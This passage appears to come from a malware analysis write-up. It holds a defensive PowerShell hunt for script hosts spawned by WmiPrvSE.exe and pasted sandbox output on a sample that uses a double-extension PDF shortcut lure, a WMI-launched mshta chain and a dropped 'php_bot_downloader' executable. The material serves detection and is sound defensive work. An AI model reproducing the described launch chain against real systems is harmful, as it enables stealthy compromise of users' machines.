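    # Children of WmiPrvSE.exe that are script hosts: this is how "wmic process call create mshta ..."
    # shows up in the process tree. PID reuse can mislead a snapshot; confirm with creation times.
    $hosts = 'mshta.exe', 'powershell.exe', 'pwsh.exe', 'cmd.exe', 'wscript.exe', 'cscript.exe'
    $all   = @(Get-CimInstance Win32_Process -ErrorAction SilentlyContinue)
    $byPid = @{}
    foreach ($p in $all) { $byPid[[int]$p.ProcessId] = $p }
    foreach ($p in $all) {
        if ($hosts -notcontains $p.Name.ToLowerInvariant()) { continue }
        $parent = $byPid[[int]$p.ParentProcessId]
        if ($null -ne $parent -and $parent.Name -ieq 'WmiPrvSE.exe') {
            [pscustomobject]@{ Pid = $p.ProcessId; Name = $p.Name; Parent = $parent.Name; CommandLine = $p.CommandLine }
        }
    }
}

Get-StartupScriptArtifacts | Format-List
Get-UserProfilePhpRuntimes | Format-List
Get-WmiSpawnedScriptHosts  | Format-List
```

On a host hit by this sample the first function should return PHP-8.2.vbs with a first line that names the interpreter path, the second should show php.exe under php-8.2.11-Win32-vs16-x64 with any running instances and their command lines, and the third is only useful while the launch chain is still alive; for historical coverage, the same WmiPrvSE.exe parent condition belongs in the process-creation rule of whatever telemetry (Sysmon event 1, EDR) the environment keeps.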

        Hooking and other Techniques for Hiding and Protection

        Source: Possible double extension: pdf.lnk Static PE information: HateSpeech2024_Summary.pdf.lnk.bin.lnk
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeCode function: 12_2_00007FF658E2CBF4 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,12_2_00007FF658E2CBF4
        Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX

        Malware Analysis System Evasion

        Source: php_zend_test.dll.21.dr | Binary or memory string: ZEND_TEST.OBSERVER.ENABLED0ZEND_TEST.OBSERVER.SHOW_OUTPUT1ZEND_TEST.OBSERVER.OBSERVE_ALLZEND_TEST.OBSERVER.OBSERVE_INCLUDESZEND_TEST.OBSERVER.OBSERVE_FUNCTIONSZEND_TEST.OBSERVER.OBSERVE_DECLARINGZEND_TEST.OBSERVER.OBSERVE_FUNCTION_NAMESZEND_TEST.OBSERVER.SHOW_RETURN_TYPEZEND_TEST.OBSERVER.SHOW_RETURN_VALUEZEND_TEST.OBSERVER.SHOW_INIT_BACKTRACEZEND_TEST.OBSERVER.SHOW_OPCODEZEND_TEST.OBSERVER.SHOW_OPCODE_IN_USER_HANDLERZEND_TEST.OBSERVER.FIBER_INITZEND_TEST.OBSERVER.FIBER_SWITCHZEND_TEST.OBSERVER.FIBER_DESTROYZEND_TEST.OBSERVER.EXECUTE_INTERNALCANNOT CALL %.*S() DYNAMICALLYSOURCE_STRINGFILENAMEPOSITIONARGSTRVARIABLEBYTES3PARAMSTDCLASSARG1TRAVERSABLEARG2OBJECTZENDTESTUNITENUMPARAMETEROBJ_OR_CLASSMETHODMESSAGETHROWABLEELEMENTSEXCEPTIONZENDTESTNS\UNLIKELYCOMPILEERRORZEND_TEST_ARRAY_RETURNZEND_TEST_NULLABLE_ARRAY_RETURNZEND_TEST_VOID_RETURNZEND_TEST_COMPILE_STRINGZEND_TEST_DEPRECATEDZEND_TEST_ALIASEDZEND_TEST_DEPRECATED_ALIASEDZEND_CREATE_UNTERMINATED_STRINGZEND_TERMINATE_STRINGZEND_LEAK_VARIABLEZEND_LEAK_BYTESZEND_STRING_OR_OBJECTZEND_STRING_OR_OBJECT_OR_NULLZEND_STRING_OR_STDCLASSZEND_STRING_OR_STDCLASS_OR_NULLZEND_ITERABLEZEND_WEAKMAP_ATTACHZEND_WEAKMAP_REMOVEZEND_WEAKMAP_DUMPZEND_GET_UNIT_ENUMZEND_TEST_PARAMETER_WITH_ATTRIBUTEZEND_GET_CURRENT_FUNC_NAMEZEND_CALL_METHODZEND_TEST_ZEND_INI_PARSE_QUANTITYZEND_TEST_ZEND_INI_PARSE_UQUANTITYZEND_TEST_ZEND_INI_STRZEND_GET_MAP_PTR_LASTZEND_TEST_CRASHZENDTESTNS2\NAMESPACED_FUNCZENDTESTNS2\NAMESPACED_DEPRECATED_FUNCZENDTESTNS2\NAMESPACED_ALIASED_FUNCZENDTESTNS2\NAMESPACED_DEPRECATED_ALIASED_FUNCZENDTESTNS2\